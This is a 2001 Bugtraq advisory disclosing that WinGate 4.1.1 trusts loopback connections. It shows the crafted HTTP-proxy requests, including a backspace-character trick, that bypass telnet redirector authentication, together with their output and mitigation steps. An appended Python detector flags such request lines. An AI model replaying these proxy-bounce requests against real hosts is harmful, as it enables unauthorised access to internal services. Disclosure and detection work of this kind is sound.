Bugtraq mailing list archives

Wingate 4.1.1, new year's bug: UPDATE


From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Thu, 25 Jan 2001 22:15:11 -0000

Hi,
I posted the mail below to bugtraq a few days ago describing a somewhat weird
bug in wingate 4.1.1 (last release) that allows bypassing all
authentication/wrapper mechanisms in the software.
After further tests, I think I know why.
When you configure a proxy service in the properties window, you have to
choose, among others, your binding/Interfaces/Policy settings.
These three are very important for your safety.
The first determines which interface connections are allowed to come from.
The second, to which one they should be sent.
The third one determines your per-user policy.
By default, binding settings come with "Allow connections coming in on any
interface" checked, which includes loopback 127.0.0.1.

THE FLAW IS HERE !!

When connecting to my telnet redirector (port 23 with only one user "admin"
allowed), I'm prompted for login/password, but when connecting directly from
loopback (on the proxy host), no authentication at all!
All clear: if users can use the http proxy they can use loopback and the
redirector too, to bypass authentication/IP wrapper for other services,
like I described it in the previous post.
For example:
#telnet wingate_ip 80
GET http://127.0.0.1:23/

I changed my TELNET PROXY binding settings to "Connections will be
accepted from the following interface only xxx.xxx.xxx.xxx" (I mean
anything other than loopback). I was unable to do a bounce attack anymore,
even trying GET http://xxx.xxx.xxx.xxx:23

It seems to be a BUG in the security scheme used by wingate, which trusts that
anything coming from 127.0.0.1 is already authenticated.

If you look at "advanced options" in the Options menu, you will find that the
default configuration trusts any interface; you can't disable trusting of
127.0.0.1 (at least not with an eval version). Maybe disabling this would
do the job.

My second piece of advice in my post was
2/ Remove your services' default binding to 127.0.0.1; when you don't use
a service at all, suppress all its instances.

Now I would say

2/ ALWAYS remove your services' default binding to 127.0.0.1 (never use
loopback), just use the IP address you really need!


Have a nice day,



===================================
Gregory Duchemin   -- Security consultant
NEUROCOM CANADA
1001 bd maisonneuve Ouest, suite 200
Montreal, Quebec, H3A 3C8 Canada
c3rb3r () hotmail com



=======
Hi bugtraqers,

wingate 4.1.1 is once again vulnerable because (once again!) of a too
permissive redirector engine (tested with the pro eval version on NT server 4.0).

It is usual to say that redirector services, telnet and ftp at least, should
be granted to only a few people (authentication) and bound only on a private
interface (binding configuration) while accepting connections from some
specific network/IP (wrapping).
Nevertheless, most of the time, http proxies, even bound only on a private
segment, are granted to all employees, for public usage.

There is a way to abuse wingate services' authentication/wrapper/binding
schemes simply by using the http proxy. Any user allowed to connect to the
proxy should be able to use any of the UP wingate services.

For instance, if you create an admin account, allowed to use your telnet and
ftp services, while discarding all other users, you'll be asked for
username/password authentication next time you connect to these ports (NT
scheme or wingate one depending on what you chose).
Weather is clear.

Now, if you connect to the web proxy port and craft a special request for the
local telnet service while using ctrl-H chars, you will be able to bypass
both policy (authentication) and IP wrapper (binding conf), leading to
remotely forcing wingate to open a telnet, ftp, whatever... connection to any
other host, potentially even from outside to inside the corporate network if
the http proxy is reachable from outside (however, it was already a bad idea
before this bug).
If you don't use telnet, ftp, whatever services but have left them bound on
loopback (default configuration), you are vulnerable.

Take a look at that:

#telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escaped character is ^]
Login:

The telnet redirector asks for credentials.
Till now, everything looks quiet.

And now....

#telnet 10.0.0.1 80
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escaped character is ^]
GET http://127.0.0.1:23/H3ll
WinGate> GET /H3ll
Connecting to host GET.....Host name lookup 'GET' Failed
HTTP/1.0
Connecting to host....Socket error   blahblahblah........

Great! We catch a wingate telnet prompt: WinGate>
Telnet even tried to connect to "GET /H3ll"!
Maybe we could forge a good request (a valid hostname/IP).
Let's try something with ^H (this old friend ;) )

#telnet 10.0.0.1 80
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escaped character is ^]

GET^H^H^H http://127.0.0.1:23/^H^H127.0.0.1
(3 ^H for GET, 2 more for / and ' ')

WInGate>127.0.0.1
Connecting to host 127.0.0.1...Connected
Connection terminated by remote host
Connection closed by foreign host

It's OK!... connection was established between the telnet and pop3 services.
It's possible to jump from service to service inside wingate, bypassing every
authentication system. Each connection is present in the logging window, but
if you look more carefully in the telnet session properties you will see that
we were telnet-authenticated as administrator (the only user allowed in the
conf) without any password and from 127.0.0.1 ;) really funny!

Conclusion:

1/ Never grant access from outside your corporate network, especially to the
http proxy service. Allowing this would make all your private network vulnerable
from the Internet; anybody would be able to pass through your proxy and thus
potentially reach office servers through other wingate services. Nothing
really new.

2/ Remove your services' default binding to 127.0.0.1; when you don't use
a service at all, suppress all its instances.

3/ Never use the telnet service, too weak, too dangerous.
Even with all the security rules above, users from inside your network may
still be able to use the http proxy as a redirector toward any other
hosts/services.

4/ In the www proxy interface configuration, choose the right interface for
outbound connections to prevent any redirection, and so, any attack in your
network.

I did not see any configuration option to, at least, fix a port range inside
all http proxy requests. It would be a nice idea.
I suppose things are quite similar by using ftp to reach http, pop, telnet, ...
and so on.
Any thoughts?

Have a nice day


===================================
Gregory Duchemin   -- Security consultant
NEUROCOM CANADA
1001 bd maisonneuve Ouest, suite 200
Montreal, Quebec, H3A 3C8 Canada
c3rb3r () hotmail com
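As an added, defensive illustration (not code from the post or from WinGate), the following Python screens proxy request lines for the two ingredients of the trick described in the message above: a target on the loopback address (or on a port that is not a web port) and embedded control characters such as ^H. The allowed-port set and the sample request lines are assumptions constructed here.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumption: only these destination ports are legitimate for a web proxy.
WEB_PORTS = {80, 443, 8080}
# Any ASCII control character except tab; the ^H trick relies on the backend
# service treating 0x08 as an editing keystroke rather than data.
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def analyse_request_line(line: str) -> list[str]:
    """Return the reasons a proxy request line should be refused ([] means clean)."""
    reasons = []
    if CONTROL_CHARS.search(line):
        reasons.append("control characters in request")
    parts = line.split()
    # A proxy-style request carries an absolute URI as its second token.
    if len(parts) < 2 or not parts[1].lower().startswith("http://"):
        reasons.append("not an absolute-URI proxy request")
        return reasons
    try:
        url = urlsplit(parts[1])
        host, port = url.hostname, url.port or 80
    except ValueError:
        return reasons + ["unparseable target URL"]
    if host is None:
        return reasons + ["missing target host"]
    try:
        is_loopback = ipaddress.ip_address(host).is_loopback
    except ValueError:                      # a name rather than an IP literal
        is_loopback = host.lower() == "localhost"
    if is_loopback:
        reasons.append(f"target {host} is loopback")
    if port not in WEB_PORTS:
        reasons.append(f"target port {port} is not a web port")
    return reasons


def flag_suspicious(log_lines: list[str]) -> list[tuple[int, list[str]]]:
    """Scan captured request lines; return (1-based line number, reasons) for hits."""
    return [(n, r) for n, l in enumerate(log_lines, 1) if (r := analyse_request_line(l))]


# Constructed sample: an ordinary request next to the two shapes from the post.
SAMPLE_REQUESTS = [
    "GET http://www.example.com/index.html HTTP/1.0",
    "GET http://127.0.0.1:23/H3ll HTTP/1.0",
    "GET\x08\x08\x08 http://127.0.0.1:23/\x08\x08127.0.0.1",
]

if __name__ == "__main__":
    for n, why in flag_suspicious(SAMPLE_REQUESTS):
        print(n, "; ".join(why))
```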



